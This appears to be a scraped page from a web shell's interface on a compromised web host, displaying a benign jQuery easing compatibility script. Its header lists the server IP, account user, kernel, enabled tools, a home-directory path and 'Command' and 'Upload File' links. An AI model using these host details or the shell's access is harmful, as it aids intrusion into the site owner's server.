Server IP : 103.53.40.154 / Your IP : 3.147.36.106 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/ppcad7no/fastelevator.in/admin/images/../vendor/jquery-easing/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
(function($){ $.extend( $.easing, { easeIn: function (x, t, b, c, d) { return $.easing.easeInQuad(x, t, b, c, d); }, easeOut: function (x, t, b, c, d) { return $.easing.easeOutQuad(x, t, b, c, d); }, easeInOut: function (x, t, b, c, d) { return $.easing.easeInOutQuad(x, t, b, c, d); }, expoin: function(x, t, b, c, d) { return $.easing.easeInExpo(x, t, b, c, d); }, expoout: function(x, t, b, c, d) { return $.easing.easeOutExpo(x, t, b, c, d); }, expoinout: function(x, t, b, c, d) { return $.easing.easeInOutExpo(x, t, b, c, d); }, bouncein: function(x, t, b, c, d) { return $.easing.easeInBounce(x, t, b, c, d); }, bounceout: function(x, t, b, c, d) { return $.easing.easeOutBounce(x, t, b, c, d); }, bounceinout: function(x, t, b, c, d) { return $.easing.easeInOutBounce(x, t, b, c, d); }, elasin: function(x, t, b, c, d) { return $.easing.easeInElastic(x, t, b, c, d); }, elasout: function(x, t, b, c, d) { return $.easing.easeOutElastic(x, t, b, c, d); }, elasinout: function(x, t, b, c, d) { return $.easing.easeInOutElastic(x, t, b, c, d); }, backin: function(x, t, b, c, d) { return $.easing.easeInBack(x, t, b, c, d); }, backout: function(x, t, b, c, d) { return $.easing.easeOutBack(x, t, b, c, d); }, backinout: function(x, t, b, c, d) { return $.easing.easeInOutBack(x, t, b, c, d); } });})(jQuery);